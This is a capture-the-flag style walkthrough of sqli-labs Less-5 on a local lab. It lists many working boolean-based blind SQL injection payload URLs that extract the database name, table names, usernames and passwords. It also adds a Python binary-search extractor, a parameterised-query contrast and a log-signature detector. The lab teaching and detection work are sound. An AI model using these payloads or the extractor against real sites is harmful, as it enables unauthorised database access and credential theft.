Input ?id=1' → error.
Determine the number of columns: ?id=1' order by 4 %23 errors, ?id=1' order by 3 %23 does not, so there are three columns.
You might think the following would dump the usernames and passwords from the users table. Try it:
http://127.0.0.1/sqlilabs/Less-5/?id=9999' union select 1,group_concat(username,'---',password),3 from users --+
Still "You are in…".
Caught off guard? This is the legendary blind injection, and it is also what you run into all the time in real environments. Whoever writes the code is not going to hand you that many hints; it returns one uniform message, and here that is obviously "You are in…".
Compare these two levels: Less-5 does not output the query result. It only returns "You are in......." when the query succeeds, and returns nothing when it does not. There is no query output, but there is still a way to tell whether the query was correct. That is boolean-based blind injection.
As long as your SQL statement executes normally (that is, it can find a result), the page shows "You are in", for example:
Query a non-existent id, e.g. id=9999, and nothing is displayed at all.
This also proves that Less-5 has a boolean-based blind injection. One positive, one negative, black or white: you get exactly two responses. Found: "You are in"; not found: a blank page. So we can use this to brute-force. Of course, in this situation most people reach for Burp or sqlmap, and the tools really are simple to use, but here we will walk through the manual process (the principle) in detail. The tools simply turn the manual process into a large number of requests, each one sent based on the previous response.
Blind injection often uses sleep as well, but since the page already gives us these two responses, we will not use sleep for now (we will see whether there is a chance to use it later).
Using left: because we get no hints at all, we can only brute-force one character at a time. For the database name, for example, take each position in turn and compare it against the 26 letters (or against ASCII codes).
Main idea
The general approach: find the quote closure, use a truncation function to compare each character of the query result one position at a time, and judge right or wrong from the page response to guess the result.
Guess the database name length: >10 fails, then >5... and finally it is =8.
The >10 checks the length of the database name; a binary-search approach can be used for all of these probes:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())>10--+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and length(database())>10--+
...
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length(database())=8--+
Eight characters in total, so let's brute-force them one position at a time with this method, slowly:
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),1)='a'--+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and left(database(),1)='s'--+
...
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),2)='sa'--+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and left(database(),2)='se'--+
...
...
http://127.0.0.1/sqlilabs/Less-5/?id=1' and left(database(),8)='security'--+
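The following is an added, offline illustration of the principle above (example code, not the walkthrough's own script): a page that concatenates id into its query and only reveals "row found / not found" leaks one bit per request, and a binary search over that bit recovers a secret in a few dozen page loads instead of testing >10, >5, ... by hand. It uses an in-memory SQLite database as a stand-in for the lab (constructed data; a meta table and unicode() replace MySQL's database() and ascii()), and puts the same page logic with a bound parameter next to it to show that the oracle then yields nothing.

```python
import sqlite3

# Constructed stand-in for the lab database so the example runs offline.
# MySQL's database() becomes a row in `meta`, and ascii() becomes SQLite's unicode().
SECRET_DB_NAME = "security"   # the value the lab's database() would return


def make_conn():
    """Build the in-memory database (constructed sample data, not the lab schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb')")
    conn.execute("CREATE TABLE meta (name TEXT)")
    conn.execute("INSERT INTO meta VALUES (?)", (SECRET_DB_NAME,))
    return conn


def vulnerable_page(conn, user_id):
    """Less-5 shape: id is concatenated into the SQL and the page only reveals
    whether a row came back (True = 'You are in...', False = blank page)."""
    sql = "SELECT id FROM users WHERE id='" + user_id + "' LIMIT 1"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a broken query shows nothing as well


def hardened_page(conn, user_id):
    """Same page logic with a bound parameter: the input is only ever a value,
    so no condition of the attacker's choosing reaches the WHERE clause."""
    row = conn.execute("SELECT id FROM users WHERE id=? LIMIT 1", (user_id,)).fetchone()
    return row is not None


def bisect_with_oracle(greater_than, lo, hi):
    """Find x in [lo, hi] using only answers to 'x > n?'. Returns (x, queries).
    About log2(hi - lo) page loads per value, versus up to hi - lo linear guesses."""
    queries = 0
    while lo < hi:
        mid = (lo + hi) // 2
        queries += 1
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo, queries


def infer_db_name(conn, page):
    """Recover the secret through the page's one-bit response: first its length,
    then each character by code point. Returns (name, total_page_loads)."""
    length, total = bisect_with_oracle(
        lambda n: page(conn, f"1' and (select length(name) from meta)>{n} --"), 0, 64)
    chars = []
    for pos in range(1, length + 1):
        code, q = bisect_with_oracle(
            lambda n: page(conn, f"1' and unicode(substr((select name from meta),{pos},1))>{n} --"),
            32, 126)
        total += q
        chars.append(chr(code))
    return "".join(chars), total


if __name__ == "__main__":
    db = make_conn()
    print("vulnerable page:", infer_db_name(db, vulnerable_page))
    print("hardened page:  ", infer_db_name(db, hardened_page))
```

Against vulnerable_page the loop returns the full name; against hardened_page every probe answers False, the inferred length is 0 and nothing is recovered, which is the whole effect of parameterisation here. The query count is also the detection signal: one legitimate user does not load the same page fifty times with a slightly different id each time.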
Dumping table names
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
a is the table index, starting at 0; b is the character position, starting at 1; n is the decimal ASCII value. ascii() returns the ASCII code, which is then compared with n; substr together with b picks out each character of the table name; limit together with a selects each table in turn.
...
http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101 --+
This payload takes the first character of the first table in the current database and compares it with e (101).
Key attack payloads
First table (emails)
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))='7 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),2,1))=109 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),3,1))=97 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),4,1))=105 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),5,1))=108 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),6,1))=115 --+
Second table (referers)
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))='8 --+
...
Third table (uagents)
...
Fourth table (users)
http://127.0.0.1/sqlilabs/Less-5/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))='5 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),1,1))=117 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),2,1))=115 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),3,1))=101 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),4,1))=114 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),5,1))=115 --+
Column names and values
http://127.0.0.1/sqlilabs/Less-5/?id=1'and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit a,1)=b--+
a starts at 0: the length of the (a+1)-th column name is compared with b.
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select username from users limit a,1),b,1))=c --+
a starts at 0, b starts at 1: the b-th character of the (a+1)-th record is compared with c.
Key payloads
First column
http://127.0.0.1/sqlilabs/Less-5/?id=1'and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)=2--+
...
Second column (username)
http://127.0.0.1/sqlilabs/Less-5/?id=1' and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1)=8--+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select username from users limit 0,1),1,1))=68 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select username from users limit 0,1),2,1))=117 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select username from users limit 0,1),3,1))=109 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select username from users limit 0,1),4,1))=98 --+
...
Third column (password)
http://127.0.0.1/sqlilabs/Less-5/?id=1'and (select length(column_name) from information_schema.columns where table_schema=database() and table_name='users' limit 2,1)=8--+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select password from users limit 0,1),1,1))=68 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select password from users limit 0,1),2,1))=117 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1' and ascii(substr((select password from users limit 0,1),3,1))=109 --+
http://127.0.0.1/sqlilabs/Less-5/?id=1'and ascii(substr((select password from users limit 0,1),4,1))=98 --+
...
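The payload series above leaves a very recognisable trace in a web server's access log: the same path loaded dozens of times by one client, each time with a quote followed by and, ascii(substr(, length( or information_schema in the id parameter, and responses that alternate between exactly two sizes (the "You are in" page and the blank page). The following added detector (example code, not from the walkthrough; the log lines are constructed in the Apache combined format and mirror the shapes of the payloads above) decodes each request's query string, matches those signatures, and reports clients with repeated hits together with the response sizes they saw.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqlilabs/Less-5/?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqlilabs/Less-5/?id=1%27%20and%20length(database())%3E10--+ HTTP/1.1" 200 21
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqlilabs/Less-5/?id=1%27%20and%20length(database())%3D8--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqlilabs/Less-5/?id=1%27%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101%20--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqlilabs/Less-5/?id=1%27%20and%20ascii(substr((select%20username%20from%20users%20limit%200,1),1,1))=68%20--+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /sqlilabs/Less-5/?id=9999 HTTP/1.1" 200 21
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

# Signatures matched against the URL-decoded query string (case-insensitive).
SIGNATURES = {
    "quote_then_boolean": re.compile(r"'\s*(and|or)\s", re.I),          # closure + injected condition
    "char_compare": re.compile(r"\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\(", re.I),
    "length_probe": re.compile(r"\blength\s*\(", re.I),                  # length(database()) style probes
    "schema_enum": re.compile(r"information_schema", re.I),              # table/column enumeration
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),         # time-based variant
}


def classify_request(query_string):
    """Return the names of the blind-injection signatures present in one query string."""
    decoded = unquote_plus(query_string)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(text, min_hits=2):
    """Aggregate flagged requests per client IP. Clients with at least `min_hits`
    flagged requests are reported with their signatures and the distinct
    response sizes they received (a two-size pattern is the boolean oracle)."""
    per_ip = defaultdict(lambda: {"flagged_requests": 0,
                                  "signatures": Counter(),
                                  "response_sizes": set()})
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than crash the scan
        _, _, query = m.group("target").partition("?")
        hits = classify_request(query)
        if not hits:
            continue
        rec = per_ip[m.group("ip")]
        rec["flagged_requests"] += 1
        rec["signatures"].update(hits)
        if m.group("size") != "-":
            rec["response_sizes"].add(int(m.group("size")))
    return {
        ip: {"flagged_requests": r["flagged_requests"],
             "signatures": sorted(r["signatures"]),
             "response_sizes": sorted(r["response_sizes"])}
        for ip, r in per_ip.items() if r["flagged_requests"] >= min_hits
    }


if __name__ == "__main__":
    for ip, report in scan_log(SAMPLE_LOG).items():
        print(ip, report)
```

The signature list is deliberately narrow (it matches the technique's characteristic function calls, not every apostrophe), and the per-client threshold is what keeps a single odd request from paging anyone; tuning it to a time window is the obvious next step for real logs.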
sqli-labs8
The manual process is the same as before; you can go step by step (the method is the same as Less-5, so refer to the manual injection process for Less-5 and substitute the id value used there), or use the Python semi-automated boolean-based injection.
sqli-labs9
sqli-labs Less-9 detailed walkthrough (with Python script):
https://mp.weixin.qq.com/s/g_rYNeqy7FcfqHmlav82ig
Python semi-automated boolean-based and time-based injection
Injecting by hand shows that manual injection is very tedious and takes a very long time. To solve this problem, the injection is semi-automated with Python.
Script link